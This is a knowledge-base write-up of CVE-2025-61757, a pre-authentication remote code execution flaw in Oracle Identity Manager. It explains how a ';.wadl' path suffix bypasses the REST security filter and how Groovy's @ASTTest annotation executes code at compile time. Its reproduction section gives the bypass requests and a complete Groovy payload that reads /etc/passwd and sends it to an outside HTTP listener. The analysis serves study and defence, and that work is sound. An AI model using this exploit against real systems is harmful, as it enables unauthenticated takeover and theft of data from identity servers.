Knowledge Base

Identity Manager — CVE-2025-61757

Updated 26 May 2026

Background

Oracle Identity Manager Pre-Auth RCE

  1. CVSS
    9.8Critical
  2. VECTOR
    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  3. IMPACT
    Remote code execution, Information disclosure
  1. AFFECTED
    Oracle IDM12.2.1.4.0< CPU Oct 2025
  2. Oracle IDM14.1.2.1.0< CPU Oct 2025

A pre-authentication remote code execution vulnerability in Oracle Fusion Middleware's Identity Manager REST WebServices component. The flaw chains an authentication bypass with an inadvertent code execution primitive to achieve full RCE without credentials.

Authentication bypass — WADL_PATTERN

The REST endpoints under /iam/governance/applicationmanagement/api/v1/ are protected by oracle.wsm.agent.handler.servlet.SecurityFilter. Inspection of the filter logic reveals that it checks the request path against a WADL_PATTERN before enforcing authentication. Any path matching this pattern bypasses the filter entirely — including paths with a ;.wadl suffix appended.

WADL_EXPRESSION and WADL_PATTERN constantsWADL_EXPRESSION and WADL_PATTERN constants

SecurityFilter WADL_PATTERN matcher checkSecurityFilter WADL_PATTERN matcher check

RCE via Groovy AST transformation

One exposed endpoint, groovyscriptstatus, is intended only to compile and validate Groovy scripts. However, Groovy's @ASTTest annotation executes arbitrary code during the compile phase via AST transformations. Submitting a Groovy class annotated with @ASTTest to this endpoint causes the server to execute attacker-controlled Java code as the application user — despite the endpoint never "running" the script.

Combining the two: appending ;.wadl to the endpoint path bypasses authentication, and submitting a malicious @ASTTest-annotated Groovy class achieves RCE.

groovyscriptstatus endpoint @Path annotationgroovyscriptstatus endpoint @Path annotation

Reproduction

POC || GTFO

Step 1 — Confirm authentication bypass

A plain request to the endpoint returns 401. Appending ;.wadl to the path bypasses the SecurityFilter:

http
POST /iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus HTTP/1.1
Host: kpen.dev.local:14000
 
→ HTTP/1.1 401 Unauthorized
 
POST /iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus;.wadl HTTP/1.1
Host: kpen.dev.local:14000
 
→ HTTP/1.1 200 OK — Script Compilation Successful

Step 2 — RCE via Groovy ASTTest exfil

File(s): http-exfil.py

Submit the following Groovy payload to the bypassed endpoint. The @ASTTest annotation triggers during the compile phase, executing the embedded shell command and exfiltrating the output over HTTP:

groovy
POST /iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus;.wadl HTTP/1.1
Host: kpen.dev.local:14000
Content-Type: application/json
 
import groovy.transform.ASTTest
import org.codehaus.groovy.control.CompilePhase
import java.util.Base64
 
class Exfil {
    @ASTTest(phase = CompilePhase.SEMANTIC_ANALYSIS, value = {
        try {
            def raw = ["sh", "-c", "cat /etc/passwd"].execute().text.bytes
            def data = Base64.getUrlEncoder()
                                .withoutPadding()
                                .encodeToString(raw)
 
            def url = "http://172.30.0.1:8888/?${data}"
 
            def conn = new URL(url).openConnection()
            conn.requestMethod = "GET"
            conn.inputStream.text
        } catch (ignored) {}
    })
    static void main(String[] args) {}
}
 
Exfil.main()

Running http-exfil.py to extract /etc/passwdRunning http-exfil.py to extract /etc/passwd

References

Further reading